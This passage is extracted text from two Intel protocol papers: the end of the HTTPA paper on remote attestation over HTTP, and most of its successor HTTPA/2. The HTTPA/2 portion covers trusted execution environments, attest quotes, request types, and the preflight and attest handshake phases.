The pre-session secret is the secret we sent earlier, which is simply an array of bytes. We then concatenate the random bytes which are sent via HTTP attest request/response from both server and client sides. We use PRF to combine the secrets with the concatenated random bytes from both server/client sides. The bytes from the “key block” are used to populate the following: client_write_MAC_secret[size] server_write_MAC_secret[size] client_write_key[key_material_length] server_write_key[key_material_length] client_write_IV[IV_size] server_write_IV[IV_size] The use of Initialization Vectors (IVs) depends on which cipher suite is selected at the very beginning, and we need two Message Authentication Code (MAC) keys for each side. In addition, both sides need the encrypt keys and use those trusted session keys to make sure that the encrypted request data has not been tampered with and can only be seen by the request handlers running in the attested TCB.
Fig. 7. The summary of the primary steps of HTTPA, including quote generation, third-party quote verification, obtaining TEE’s public key, and the pre-session secret to establishing the trusted channel between the server and the client
The client needs to verify the server quote to establish the trustworthiness of the platform, including verifying the integrity of the codes running inside the TCB of web services. Usually, there are authorities that offer such services, the client can request a trusted attestation service to verify the server quote. A verifier quote may be returned to the client along with the verification result;
HTTPA
821
thus, the client side can collect several identities to make a decision, the router, shown in Fig. 7, could be placed in the un-trusted part of a web application to route service requests corresponding to HTTP header, the web applications is expected to create multiple isolated TCB to confidentially handle a different kind of requests. 1. Domain identity It is the identity issued by a Certificate Authority (CA), and it is used in the TLS protocol 2. TCB identity It is the identity of web service TCB, measured by hardware and it is embedded in a quote. 3. Vendor identity It is a signing identity of web service provided by a CA, which signs the TCB prior to distribution 4. Verifier identity The identity is received from an attestation service along with the attesting result. All those identities need to be validated by verifying their certificate chain. The user can selectively add any combinations of them to the allowed list or denied list. 4.4
Mutual HTTPA (mHTTPA)
In addition to the one-way HTTPA protocol, HTTPA includes another direction, so both client and server attest to each other to ensure that both parties involved in the communication are trusted. Both parties share their quotes on which the verification and validation are performed. Figure 8 shows the handshake process of mHTTPA protocol. Compared to one-way HTTPA, see Fig. 6, the difference is that client will send its quote and its TEE public key to the server in the first request to allow the server for verifying the quote, and then send a service quote back as a response if the client quote got attested. There is a slight change to the key block generation as well, for now, both sides need to include two pre-session secrets for deriving session keys in their own TEEs, respectively. key_block = PRF(server_pre_session_secret, client_pre_session_secret, ‘‘trusted mutual session keys’’, ClientAttest.random + ServerAttest.random)
822
G. King and H. Wang
Fig. 8. Comparing with Fig. 6, the major difference of mHTTPA from one-way HTTPA is the step of HTTP Attest Request. After confirming the server’s capability to provide attestation described in Fig. 5, the client generates its own quote for the server to verify. Then the client sends HTTP Attest Request to the server, which includes the client’s generated quotes, TEE public key, random bytes, cipher suites, and meta information. Then the server verifies the quote of the client. If the client’s quote is not verified successfully, the communication stops. If the quote is verified successfully, the server generates its quote. Then the server sends HTTP Attest Response to respond to the client with the server’s quote, TEE public key, random bytes, chosen cipher algorithm, and the meta information. After this part, the remaining steps follow the same as described in Fig. 6 for each party.
5
Summary
This paper presents the HTTPA as a new protocol to unify the attestation process and HTTPS. With HTTPA, we can establish a trusted channel over HTTPS for web service access in a standard and effective way. We demonstrate the proposed HTTPA protocol where attestation is used to provide assurances for verification, and we show how a web service is properly instantiated on a trusted platform. The remote web user or system can then gain confidence that only such intended request handlers are running on the trusted hardware. Using HTTPA, we believe that we can reduce security risks by verifying those assurances to determine the acceptance or rejection.
HTTPA
823
References 1. Fetch c software guard extensions ecdsa - attestation for data center orientation 2. Intel guide c c software guard extensions (intel sgx). https://www.intel.com/content/ 3. Intel www/us/en/architecture-and-technology/software-guard-extensions.html c software guard exten4. Quote generation, verification, and attestation with intel c sions data center attestation primitives (intel SGX DCAP) 5. Remote attestation 6. Amann, J., Gasser, O., Scheitle, Q., Brent, L., Carle, G., Holz, R.: Mission accomplished? https security after diginotar. In: Proceedings of the 2017 Internet Measurement Conference, pp. 325–340 (2017) 7. Bhardwaj, K., Shih, M.-W., Gavrilovska, A., Kim, T., Song, C.: Preserving endto-end security for edge computing. SPX (2018) 8. Roy, T.: Fielding and Julian Reschke. Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing. RFC 7230 (2014) 9. Roy, T.: Fielding and Julian Reschke. Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content. RFC 7231 (2014) 10. Khare, R., Lawrence, S.: Upgrading to TLS Within HTTP/1.1. RFC 2817 (2000) 11. Knauth, T., Steiner, M., Chakrabarti, S., Lei, L., Xing, C., Vij. M.: Integrating remote attestation with transport layer security (2019) 12. Mononen, T., Kause, T., Farrell, S., Adams, C.: Internet X.509 public key infrastructure certificate management protocol (CMP). RFC 4210 (2005) 13. Rescorla, E.: HTTP over TLS. RFC 2818 (2000) 14. Rescorla, E., Dierks, T.: The transport layer security (TLS) Protocol Version 1.2. RFC 5246 (2008) 15. Selvi, J.: Bypassing http strict transport security. Black Hat Europe, vol. 54 (2014)
HTTPA/2: A Trusted End-to-End Protocol for Web Services Gordon King and Hans Wang(B) Intel Corporation, Santa Clara, USA {gordon.king,hans.wang}@intel.com
Abstract. With the advent of cloud computing and the Internet, the commercialized website becomes capable of providing more web services, such as software as a service (SaaS) or function as a service (FaaS), for great user experiences. Undoubtedly, web services have been thriving in popularity that will continue growing to serve modern human life. As expected, there came the ineluctable need for preserving privacy, enhancing security, and building trust. However, HTTPS alone cannot provide a remote attestation for building trust with web services, which remains lacking in trust. At the same time, cloud computing is actively adopting the use of TEEs and will demand a web-based protocol for remote attestation with ease of use. Here, we propose HTTPA/2 as an upgraded version of HTTP-Attestable (HTTPA) by augmenting existing HTTP to enable end-to-end trusted communication between endpoints at layer 7 (L7). HTTPA/2 allows for L7 message protection without relying on TLS. In practice, HTTPA/2 is designed to be compatible with the in-network processing of the modern cloud infrastructure, including L7 gateway, L7 load balancer, caching, etc. We envision that HTTPA/2 will further enable trustworthy web services and trustworthy AI applications in the future, accelerating the transformation of the web-based digital world to be more trustworthy. Keywords: HTTP · HTTPA · TLS · Protocol · Attestation · TCB · TEE · Secret · Key exchange · Confidential computing · Zero trust · Web service
1
Introduction
We received positive feedback and inquiries on the previous version of HTTPA [14] (HTTPA/1). As a result, we present a major revision of the HTTPA protocol (HTTPA/2) to protect sensitive data in HTTPA transactions from cyber attacks. Comparatively, the previous work [14] is mainly focused on how to include remote attestation (RA) and secret provisioning to the HTTP protocol with Transport Layer Security (TLS) protection across the Internet, which is great, but it comes at a price. In contrast, HTTPA/2 is not necessary to rely G. King and H. Wang—Both authors contributed equally to this work. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 824–848, 2023. https://doi.org/10.1007/978-3-031-28073-3_55
HTTPA/2
825
on the TLS protocol, such as TLS 1.3 [22], for secure communication over the Internet. The design of HTTPA/2 follows the SIGMA model [16] to establish a trusted (attested) and secure communication context between endpoints at layer 7 (L7) of the OSI model. Different from connection-based protocols, HTTPA/2 is transaction-based in which the TEE is considered to be a new type of requested resource over the Internet. In addition to protecting sensitive data transmitted to TEE-based services (TServices), HTTPA/2 can potentially be used to optimize the end-to-end performance of Internet or cloud backend traffic, thus saving energy and reducing the operational costs of Cloud Service Providers (CSPs). HTTP is a predominant Layer 7 protocol for website traffic on the Internet. The HTTP/1 [14] defines an HTTP extension to handle requests for remote attestation, secret provisioning and private data transmission, so Internet visitors can access a wide variety of services running in Trusted Execution Environments (TEEs) [13] to handle their requests with strong assurances. In this way, visitors’ Personally Identifiable Information (PII) and their private data are better protected when being transmitted from a client endpoint to a trusted service endpoint inside the TEE. The HTTPA/1 supports mutual attestation if both client and service endpoints run inside the TEE. Although HTTPA/1 helps build trust between L7 endpoints with data-level protection, HTTPA/1 needs TLS to defend against attacks over the Internet, e.g., replay attacks and downgrade attacks. Note that TLS cannot guarantee end-to-end security for the HTTPS message exchange [5] when the TService is hosted behind a TLS termination gateway or inspection appliance (a.k.a. middle boxes). Despite the fact that TLS provides confidentiality, integrity and authenticity (ConfIntAuth) to ensure secure message exchange for the HTTPA/1 protocol, it is not a complete end-to-end security solution to serve web services at L7. For example, TLS termination on the middleboxes makes it highly vulnerable to cyber-attacks. Both HTTPA/1 and TLS need to generate key material through key exchange and derivation processes. This requires additional round trips at L5 and increases network latency. Thus, there is room to further optimize the network performance and reduce communication complexity by avoiding the repetition of key negotiations. Due to the limitation of TLS mentioned above, a version of HTTPA with message-level security protection is a natural candidate to address the issues mentioned above at once. This paper proposes an upgraded protocol, HTTPA/2, which makes it possible to secure HTTPA transactions even with no underlying presence of TLS. HTTPA/2 is designed to improve the processes of key exchange, RA and secret provisioning in HTTPA/1. It also enables end-to-end secure and trustworthy request/response transactions at L7, which is cryptographically bound to an attestable service base that can be trusted by Internet visitors regardless of the presence of untrusted TLS termination in between. The rest of the paper is organized as follows. Section 2 provides necessary preliminaries. Section 3 elaborates on the protocol transactions. Section 4 talks about security considerations. Section 5 concludes the whole paper.
826
2
G. King and H. Wang
Technical Preliminaries
This section provides preliminaries related to the construction of HTTPA/2. We first introduce using a Trusted Execution Environment (TEE) in a web service setting. Then we describe several important primitives to be used for constructing the HTTPA protocol described in Sect. 3. 2.1
Trusted Execution Environment (TEE)
In a TEE, trustworthy code is executed on data with CPU-level isolation and memory encryption inaccessible to anyone even those with system-level privileges. The computation inside the TEE is protected with confidentiality and integrity. A TEE is more trustworthy than a Rich Execution Environment (REE) [1] where codes are executed on data without isolation. Although most web services are deployed in REE, it is an emerging trend to deploy web services in a TEE for better security. Upon implementation, a service initialized and run inside the TEE is known as a Trusted Service, called a TService. TService uses TEE to effectively reduce its trusted computing base (TCB), which is the minimal totality of hardware, software, or firmware that must be trusted for security requirements, thus reducing the attack surface to as minimal as possible. R R Software Guard Extensions (Intel SGX) or For some TEE, such as Intel R R Intel Trust Domain Extensions (Intel TDX), it can provide evidence (or we call the evidence “Attest Quote (AtQ)” in the Sect. 2.2) reflecting configuration and identities [11] to the remote relying party. After successfully verifying the evidence and being convinced of the result, both parties finish the RA process [3,6]. With the RA completed successfully, TServices can be shown more trustworthy to its relying party. Not all TEEs are attestable, and the HTTPA is only applicable to attestable TEE which can generate such evidence for the purpose of RA. 2.2
Attest Quote (AtQ)
AtQ is an opaque data structure signed by a Quoting Service (QService) with an attestation key (AK), and it can be called a quote [19] or evidence, which is used to establish trustworthiness through identities. Because of this, the quote encapsulates code identity, ISV identity, TEE identity, and various security attributes, e.g., security version number (SVN) of a TEE [2], associated with a TService instance. A relying party can examine the quote to determine whether the TService is trustworthy or not via verification infrastructure. The quote is not a secret, and it must ensure its uniqueness, integrity and authenticity (UniqIntAuth). The quote generation involves cryptographically measuring the instantiated TCB, signing the measurements with an AK, including a nonce. The AtQ accommodates a piece of user-defined information, called Quote User Defined Data (QUDD). The QUDD can provide extra identities specific to a TService. Therefore, the AtQ can in turn help protect the integrity of
HTTPA/2
827
Attest Header Lines (AHLs) during the handshake phase which we will discuss in Sect. 3.2. It’s worth noting that not all quotes are the same, especially if they are structured by different vendors, so a label of quote type should be attached along with AtQ. 2.3
Attest Base (AtB)
AtB is the totality of computing resources serving client request handling, including hardware, firmware, software, and access controls to work together to deliver trustworthy service quality with enforced security/privacy policy. It can also be considered as a group of collaborating TService instances running in their own attestable TEEs respectively, which are capable of proving the integrity of the execution state. In this paper, the computing resources of TService are offered by AtB to be accessible to the client through a series of trusted transactions. How to attest those trustworthy services is determined by the specified policy in the handshake phase. We suggest using a single TService instance for each AtB to reduce the complexity and attack surface as much as possible. The AtB, serving for a particular service tied to a Uniform Resource Identifier (URI), should be directly or indirectly attested by a client through HTTPA/2 protocol. In the case of a AtB formed by multiple TServices instances, an upfront TServices instance takes responsibility for performing local attestation on the rest of TServices instances to establish trustworthy relationships with them. After that the upfront TServices can selectively collect their quotes for clientside verification during the HTTPA/2 handshake phase. 2.4
Three Types of Request
There are three types of request defined by the HTTPA/2 protocol, including Un-trusted Request (UtR) Attest Request (AtR), and Trusted Request (TrR). UtR is used in HTTP transactions; AtR is used in both transactions of Attest Handshake (AtHS) and Attest Secret Provisioning (AtSP); TrR is used in trusted transaction. For convenience we refer to the AtR and TrR as “HTTPA/2 request”. Regarding HTTP method, we propose a new HTTP method, called “ATTEST”, to perform the transactions of AtHS and AtSP. The HTTP request using ATTEST method is called AtR. Regarding HTTP header fields, we propose to augment them with additional ones called Attest Header Fields (AHFs) prefixed with string “Attest-”. Without AHFs, it must be a UtR in terms of HTTPA/2. The AHFs are dedicated to HTTPA traffic. For example, they can be used to authenticate the identity of HTTPA/2 transactions, indicate which AtB to request, convey confidential meta-data (see Sect. 2.7), provision secrets, present ticket (see Sect. 2.5), etc.
828
G. King and H. Wang
Last one is AHL, it consists of AHL and its values in a standard form [21]. We use it to signify a single piece of annotated data associated with the current HTTPA/2 request. Un-Trusted Request (UtR). The UtR is simply an ordinary type of HTTP request, which does not use ATTEST method nor does it contain any AHLs. Before a UtR reaches a TService, the UtR can be easily eavesdropped on or tampered with along the communication path. Even protected by TLS, it is still possible to be attacked when crossing any application gateway or L7 firewall since those intervening middle-boxes are un-trusted and will terminate TLS connections hop by hop [5]. Therefore, there is no guarantee of ConfIntAuth. That’s why the TService cannot treat the request as trustworthy, but it is still possible for TService to handle UtR if allowed by the service-side policy. Thus, we don’t suggest TService to handle any one of them for the sake of security. Attest Request (AtR). The AtR is an HTTP request equipped with both ATTEST method and AHLs for AtHS and AtSP. If any AtR was not successfully handled by corresponding TService, subsequent TrR, described in the Sect. 2.4, will no longer be acceptable to this TService. We describe the major difference between an AtR used in AtHS and AtSP respectively as follows: AtHS. The AtR used in AtHS is designed to request all necessary resources for handling both types of AtR used in AtSP and TrR. For example, one of the most important resources is AtB (see Sect. 2.3), which may be scheduled or allocated by a server-side resource arbiter. Typically (but not always), an upfront TService can directly designate itself as the AtB for this client. For the complete explanation in detail, see Sect. 3.2. In addition, this AtR should not be used to carry any confidential information, because the key material cannot be derived at this moment. TService can encrypt sensitive data in the response message since it has already received the required key share from the client and be able to derive the key material for encryption. AtSP. The AtR of AtSP is optional and may not be present in HTTPA/2 traffic flow since in some cases the TService does not need any AtB-wide secrets provided by the client to work. In the common case, TService needs secret provisioning to configure its working environment, such as connecting to databases, setup signing keys, and certificates, etc. This AtR must be issued after all TEE resources have been allocated through the AtHS transaction described above. It’s worth noting that this request is not required to be issued before any TrR Sect. 2.4. With such flexibility, TService can get extra information or do some operations beforehand through preceding TrRs. Importantly, this AtR is responsible to provision AtB-wide secrets to AtB, such as key credentials, tokens, passwords, etc. Those secrets will be wrapped by an encryption key derived from the key exchange in the AtHS phase Sect. 3.2.
HTTPA/2
829
Furthermore, the TService must ensure that those provisioned secrets will be eliminated after use, AtB get released, or any failure occurred in processing AtR. For the complete explanation in detail, see Sect. 3.3. The two kinds of AtR introduced above are the core of HTTPA/2 protocol. Both of them can be treated as GET request messages to save a RTT, and they can also be used to transmit the protected sensitive data to both sides, except for the AtR of AtHS due to the key exchange not yet completed as noted earlier. Trusted Request (TrR). The TrR can be issued right after successful AtHS (see Sect. 2.4) where an AtB is allocated. Although, TrR does not use ATTEST method, it should contain AHLs to indicate that it is a TrR not a UtR. In other words, the TrR is nothing but an ordinary AHLs request with some AHLs. Within those AHLs, one of them must be AtB ID to determine which AtB is targeted in addition to the specified URI. With that, the TrR can be dispatched to proper TService to handle this request. In essence, the TrR is designed to interact with a TService for sensitive data processing. The HTTPA/2 must ensure ConfIntAuth of a set of selected data, which may be distributed within the message body or even in the header or request line, for end-to-end protection. It turns out that not all message bytes would be protected under HTTPA/2 like TLS does. As a result, the HTTPA/2 may not be suitable for certain scenarios, e.g., simply want to encrypt all traffic bytes hop by hop. However, in most cases, the HTTPA/2 can offer a number of obvious benefits without TLS. For example, users do not need to worry about data leakage due to TLS termination, and they can save the resources required by the TLS connections. In some special cases, the HTTPA/2 can be combined with TLS to provide stronger protection but the performance overhead can be significant (see Sect. 2.8). There are many potential ways to optimize Internet service infrastructure/platform by means of adopting HTTPA/2 since the insensitive part of HTTPA/2 messages can be used as useful hints to improve the efficiency of message caching or routing/dispatching, risk monitoring, malicious message detection and so on, helping protect sensitive data in motion, as well as in processing by the client-chosen TServices. 2.5
Attest Ticket (AtT)
AtT is a type of AHL used to ensure the integrity and authenticity (IntAuth) of AHLs and freshness by applying AAD to each HTTPA/2 request, except for the AtR of AtHS which is the initiating request for the handshake. AtT is required to be unique for single use so as to mitigate the replay attack as it can be ensured by AAD in practice. Moreover, the AtT should be appended at the very end of the request body as the last trailer [9] because there might be TrC or other trailers which need to be protected by the AtT as well. Regarding the AtR of AtHS, there is no protection from AtT, because there are no derived keys available to use at such an early stage. In order to protect
830
G. King and H. Wang
the AtR of AtHS, we can use either client-side quote or pre-configured signing key methods to ensure the IntAuth instead of AtT. Typically, there are four situations to consider: mHTTPA, client with CA-signed certificate, client with self-signed certificate, and nothing to provide. Mutual HTTPA (mHTTPA). With mutual HTTPA being used, the client must be running on a TEE as TEE-based client (TClient), which is capable of generating a client-side AtQ. The AtQ can be used to ensure the IntAuth of AtR by means of including the digest of AHLs into its QUDD, and the server-side should have a proper trusted attestation authority to verify it. This is the recommended approach to build mutual trust between TClient and TService, but the client-side usually lacks of TEE feature support. Client with CA-Signed Certificate. In this case, the client signs the AHLs of tR along with a trusted certificate, and TService should be able to verify the signature with respective CA certificate chain. This way helps TService to identify the user identity. In addition, the mHTTPA can be enabled at the same time to make it more secure and trustworthy on both sides if possible. Client with Self-signed Certificate. In this situation, the client should sign the AHLs of AtR using temporary signing key, and TService should verify the signature using its self-signed certificate enclosed in the same AHL. This approach is not safe since the TService may receive compromised AtR. Nothing to Provide. There is no way to protect the integrity of AHLs under these circumstances. We recommend at least using the temporary generated signing key with the corresponding self-signed certificate. It’s worth noting that even if the AHLs of AtT is compromised, the client is able to detect the problem by checking the received AtQ of the TService as the QUDD embedded in AtQ will ensure the integrity of AHLs in its request and response messages altogether. It is difficult for the client to simply use the self-signed certificate to prove its identity, let alone in the case of nothing to provide. Again we recommend the client to combine mHTTPA and CA signed certificate approaches together to establish strong trustworthy relationship between TClient and TService if the server also wants to identify the client’s identity at the initiating request, AtR. If it is not the case, the client must detect whether any unexpected changes occurred in the AHLs of AtR as an additional critical step to defend against Man-in-the-Middle (MITM) and downgrade attacks. 2.6
Attest Binder (AtBr)
AtBr is a type of AHL used to ensure the binding between HTTPA/2 request and the corresponding response. The AHL of AtBr should be added into the response message as the last trailer [9]. The AtBr typically holds the Message Authentication Code (MAC) to protect two components: all AHLs of the current response,
HTTPA/2
831
and the value of AtT in its corresponding request. We can choose other cryptographic algorithms for encryption and message authentication, e.g., Authenticated Associated Data (AAD), Authenticated Encryption with Associated Data (AEAD) [18] to ensure the IntAuth of the AtBr. The AtBr should present in all HTTPA/2 response messages, except for the response of AtR in the AtHS phase Sect. 3.2. The reason is the quote of TService can achieve the same purpose without the help of AtBr. 2.7
Trusted Cargo (TrC)
The TrC can appear in both of HTTPA/2 request and response messages, except for the AtR of AtHS. The TrC serves as a vehicle to carry confidential information which needs to be protected by authenticated encryption. TrC can be used to protect some sensitive metadata such as data type, location, size, and key index to tell the places in which the ciphertext or signed plaintext is located in the message body. The key index indicates which key should be used to decrypt those encrypted messages or verify the message’s integrity. Potentially, there is much useful metadata that can be included in TrC, but we should keep it minimum as size limits might be enforced by intermediaries in the network path. The way to structure the metadata and how to parse it is not defined by this paper. We leave it to the future extensions of HTTPA/2 or it can be customized by application. Finally, the TrC should be put in a trailer [9] since its variable length affects the position information it contains. Again, the value of TrC must be protected from eavesdropping on or manipulating by the means of AE. 2.8
Trusted Transport Layer Security (TrTLS)
HTTPA/2 protects the selected parts of an HTTP message. If users want to protect the entire HTTP message—every bit of the message, TLS can leverage HTTPA/2 to establish a secure connection at L5 between the client and its adjacent middlebox, which we call TrTLS. The TrTLS makes use of AtHS to transmit HELLO messages of TLS [22] to the client and TService respectively for handshake. This way can make the initial handshake of the secure transport layer protocol trustworthy. We consider three cases of endpoints as follows: TClient. In the case of TClient endpoint, the TClient leverages its QUDD to ensure the IntAuth of the client hello message to establish TLS connection. The server-side verifier helps verify the QUDD. If the attestation is successful, the trusted endpoint of TClient will be established as TrTLS. Note that the TrTLS module should be co-located in the same TEE with TClient. Frontend TService. The frontend TService is defined as a TService which can communicate with the client without any L7 middleboxes in between. In other words, the communication between the TService and the client has no TLS
832
G. King and H. Wang
terminators. This implies that TService can establish a secure transport layer connection directly with its client. Thus, the IntAuth of the server-side HELLO message can be fully protected by the QUDD of TService in a similar way described in the above case of TClient but in the reverse direction. Backend TService. In the case of a backend TService endpoint, the connection of the secure transport layer will be terminated by at least one middle-box e.g., application gateway, reverse proxy, or L7 load balancer. Although TService has no direct connection with its client, the trusted connection of TLS between the client and the first middlebox can be established by checking the results of RA from the backend TService. The middlebox needs to consider the mapping of the request and the response with the backend TService to be correct in order to decide whether to use the results of RA to build a trusted connection or not. Admittedly, this is the least trustworthy configuration in terms of full traffic encryption when it is compared with the two cases mentioned above because the attack surface includes those vulnerable middleboxes in the TrTLS connection. After the initial message is exchanged through AtHS, the encrypted channel can be established under the HTTPA/2 at L5, so the following traffic will be encrypted and inherit the attested assurances of the TEE from HTTPA/2. In the case of the ordinary TLS connection prior to HTTPA/2, the TrTLS mechanism can disconnect the already built TLS connection and then re-establish a trustworthy TLS connection seamlessly. We simply present the high-level concept of TrTLS in this paper and may discuss more details in another paper.
3
Protocol Transactions
In this section, we provide detailed definitions of all HTTPA/2 transactions. 3.1
Preflight Check Phase
The preflight request gives the Web service a chance to see what the actual AtR looks like before it is made, so the service can decide whether it is acceptable or not. In addition, the client endpoint performs the preflight check as a security measure to ensure that the visiting service can understand the ATTEST method, AHFs, and its implied security assurance. To start with HTTPA/2, a preflight request could be issued by a client as optional to check whether the Web service, specified by URI in the request line, is TEE-aware and prepare for AtHS. In the case that the client is a Web browser, the preflight request can be automatically issued when the AtR qualifies as “to be preflighted”. The reason we need the preflight transaction is that it is a lightweight AHLs OPTIONS [10] request, which will not consume a lot of computing resources to handle, compared to the AtR. Caching the preflight result can avoid the re-check operation during a specified time window.
HTTPA/2
833
Passing this check does not guarantee that the AtR can be successfully handled by this service. For example, the TService may run out of resources, or the client’s cipher suites are not supported, and so on. The preflight is an idempotent operation, e.g., there is no additional effect if it is called more than once with the same input parameters. The client can also use the preflight to detect the capabilities of AtB Sect. 2.3, without implying any real actions.
Fig. 1. Preflight transaction
As shown in Fig. 1, an OPTIONS request should be honored by an HTTPA/2 compliant TService. In the preflight transaction, it has standard HFs to specify the method and AHLs which will be sent out later to the same TService if they are acceptable. Those HFs are described respectively as follows: 1. HFs in request message (a) Access-Control-Request-Method This HF carries a list of methods indicating that ATTEST method will be used in the next request if the service can support it. (b) Access-Control-Request-Headers This HF carries a list of field names indicating that the AHFs will be included in the next request if the service can support it. 2. HFs in response message (a) Allow This HF carries a list of supported methods by the visiting service. It must contain the ATTEST method for the client to proceed with AtR; otherwise, the AtR is not acceptable by this service and will be denied if received it.
834
G. King and H. Wang
(b) Access-Control-Allow-Headers This HF carries a list of allowed AHFs. The client needs to check that all of the requested AHFs should be contained in this resulting field. (c) Access-Control-Max-Age This HF indicates how long the preflight check results can be cached.
3.2
Attest Handshake (AtHS) Phase
The AtHS phase contains a core transaction of HTTPA/2. In a single round trip time (one RTT), the AtR and its response accomplishes three major tasks, including key exchange, AtB allocation and AtQ exchange, as shown in Fig. 2: 1. Key Exchange It is necessary to complete the key exchange process before any sensitive information can be transmitted between the client and TService. The exact steps within this will vary depending upon the kind of key exchange algorithm used and the cipher suites supported by both sides. In HTTPA/2, the key exchange process follows TLS 1.3 [22] and recommends a set of key exchange methods to meet evolving needs for stronger security. Insecure cipher suites have been excluded, and all public-key-based key exchange mechanisms now provide Perfect Forward Secrecy (PFS), e.g., Ephemeral Elliptic Curve Diffie-Hellman (ECDHE). Note that it is mandatory that the fresh ephemeral keys are generated and used, and destroyed afterward [20] inside the TEE of TService. When the key exchange is completed, we recommend using HMAC-based Extract-and-Expand Key Derivation Function (HKDF) [15] as an underlying primitive for key derivation. We describe the key negotiation between the client and the TService in terms of AHFs set in request and response respectively as follows: (a) AHFs in request message (or AtR): i. Attest-Cipher-Suites It is a list of cipher suites that indicates the AEAD algorithm/HKDF hash pairs supported by the client. ii. Attest-Supported-Groups It is a list of named groups [17] that indicates the (EC)DHE groups supported by the client for key exchange, ordered from most preferred to least preferred. The AHL of Attest-Key-Shares contains corresponding (EC)DHE key shares e.g., pubkeys for some or all of these groups. iii. Attest-Key-Shares Its value contains a list of the client’s cryptographic parameters for possible supported groups indicated in the AHL of Attest-SupportedGroups for negotiation. We can refer to the corresponding data structure described in TLS 1.3 [22]. It is a time-consuming operation to generate those parameters (see 3.1 in Fig. 2)
HTTPA/2
835
Fig. 2. Attest handshake (AtHS) transaction
iv. Attest-Random It is 32 bytes of a random nonce, which is used to derive the master secret and other key materials by TService. The purpose of the random nonce is to bind the master secret and the keys to this particular
836
G. King and H. Wang
handshake. This way mitigates the replay attack to the handshake as long as each peer properly generates this random nonce. (b) AHFs in response message i. Attest-Cipher-Suite It indicates the selected cipher suites, i.e. a symmetric cipher/HKDF hash pair for HTTPA/2 message protection. ii. Attest-Supported-Group It indicates the selected named group to exchange ECDHE key share generated by the TService. iii. Attest-Key-Share Its value contains the TService’s cryptographic parameters accordingly (see 3.7 in Fig. 2). iv. Attest-Random It takes the same mechanism as the Attest-Random in the request. Instead, it is used by the client to derive the master secret and other key materials. This handshake establishes one or more input secrets combined to create the actual keying materials. The key derivation process (see 3.9, 3.15 in Fig. 2), which makes use of HKDF, incorporates both the input secrets and the AHLs of handshake. Note that anyone can observe this handshake process if it is not protected by the byte-to-byte encryption at L5, but it is safe since the secrets of the key exchange process will never be sent over the wire. 2. AtB Allocation This task takes care of resource allocation. The upfront TService needs to prepare essential resources before assigning an unique AtB identifier to the AtB, which is used by the client to ask TService to process its sensitive data on this AtB (see 3.6 in Fig. 2). (a) AHFs in request message or AtR: i. Attest-Policies It can contain various types of security policies, which can be selectively supported by this AtB of TService. There are two aspects to consider as follows: Instances attestation direct: all instances should be verified by the client. indirect: only the contact instance should be verified by the client remotely. Un-trusted requests allowUntrustedReq: it allows UtR to be handled by the TService on this AtB (disabled by default). ii. Attest-Base-Creation It specifies a method used for the creation of AtB. There might be several options available to select: New It means that the AtB should be newly created for the client to use. If the contact TService is a new one, then it can be assigned to this client immediately.
HTTPA/2
837
Reuse This option allows reusable AtB to be used by this client, but the AtB should ensure that all traces associated with the previous client are erased. So far, there is no such TEE, which can achieve this security feature strictly, and we cannot fully rely on software to emulate it. As a result, the client should evaluate the risks before specifying this option. Shared A shareable AtB can be allocated to this client. The client does not care whether it is a clean base or not. Use it with caution. iii. Attest-Blocklist It indicates a list of blocked identities and other types of identifiers, which allows TService to filter out unqualified AtB beforehand. This feature is used to optimize the performance of AtB allocation, as it is quite expensive and inefficient to rely only on the client to collect a set of TService instances by using the trial and error method. (b) AHFs in response message: i. Attest-Base-ID This identifier signifies the allocated AtB, which has been tied to this particular client who sent the AtHS request. It should be used in subsequent HTTPA/2 requests to ensure those requests can be efficiently dispatched into TServices. Given that the HTTPA/2 request dispatcher may not be trustworthy, and won’t be capable to check its integrity of it. As a result, it cannot guarantee that those requests could be delivered into their matched AtBs. To remedy this problem, the dispatcher should be capable to identify invalid AtB ID as possible, and the receiving TService should validate it right after integrity check (see 4.2 in Fig. 3, 5.2 in Fig. 4). Note that the max-age directive set here indicates how long this AtB could be kept alive on the server side. 3. AtQ Exchange In HTTPA/2, a successful RA [6] increases client’s confidence by assuring the targeting services running inside a curated and trustworthy AtB. The client can also determine the level of trust in the security assurances provided by TServices through AtB. The RA is mainly aimed to provision secrets to a TEE, In this solution, we leverage this mechanism to set it as the root trust of the HTTPA/2 transactions instead of certificate-based trust, e.g., TLS. To facilitate it, we integrate the RA with the key exchange mechanism above to perform a handshake, which passes the assurance to derived ephemeral key materials (see 3.9 in Fig. 2). Those keys can be in turn used to wrap secrets and sensitive data designated by the client or TService in either direction.
838
G. King and H. Wang
During RA process, the AtQ (see Sect. 2.2) plays a key role to attest TService. It provides evidence (quote) to prove authenticity of the relevant TService (see 3.8 in Fig. 2). The client can just rely on it to decide whether the TService is a trustworthy peer or not [8]. To appraise AtQ, we need a trusted authority to be the verifier to perform the process of AtQ verification, and reports issues on this AtQ, e.g., TCB issues (see 3.12 in Fig. 2). The result of verification produced by the verifier should be further assessed by the client according to its pre-configured policy rules and applied security contexts. Importantly, the TService should ensure the integrity and authenticity of all AHLs of AtR and its response through the QUDD of AtQ, and vice versa in case of mHTTPA/2. The following AHFs should be supported by HTTPA/2 protocol for RA. (a) AHFs in request message (or AtR): i. Attest-Quotes It can only appear in mHTTPA/2 mode to indicate a set of AtQs generated from the TClients for targeting TService to verify. (see 3.2, 3.3, 3.4, 3.5 in Fig. 2). These quotes should be used to ensure IntAuth of the AHLs of this AtR through their QUDD. Note that the max-age directive indicates when these quotes are outdated and its cached verification results should be cleared up from AtB to avoid broken assurance. In addition, all client-side quotes must be verified by server-side verifier and validated by TServices before a AtB ID can be issued. (b) AHFs in response message i. Attest-Quotes It is mandatory for a AtB to present its AtQs to the client for clientside verification. The IntAuth of both AHLs of the AtR and its response should be ensured by its QUDDs to protect the transaction completely. The client must verify the AtQ to authenticate its identities of remote AtB (see 3.8, 3.10, 3.11, 3.12 in Fig. 2). The client should not trust anything received from TService before AtQs is successfully verified and evaluated. Whether the integrity of AHLs is held should be determined by client-side security policies. Note that the TService quotes can be selectively encrypted in its parts through TrC to hide its identity information. There are several remaining AHFs, which are important to this transaction as they provide other necessary information and useful security properties: (a) AHFs in request message i. Attest-Versions The client presents an ordered list of supported versions of HTTPA to negotiate with its targeting TService.
HTTPA/2
839
